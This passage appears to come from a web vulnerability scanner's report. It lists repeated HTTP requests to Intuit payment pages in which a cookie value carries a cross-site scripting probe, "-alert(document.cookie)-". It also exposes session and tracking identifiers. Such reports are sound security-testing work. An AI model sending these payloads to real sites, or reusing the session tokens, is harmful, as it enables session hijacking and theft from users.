BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/index.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/echecks-and-check-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/internet-merchant-accounts.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/online-credit-card-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; 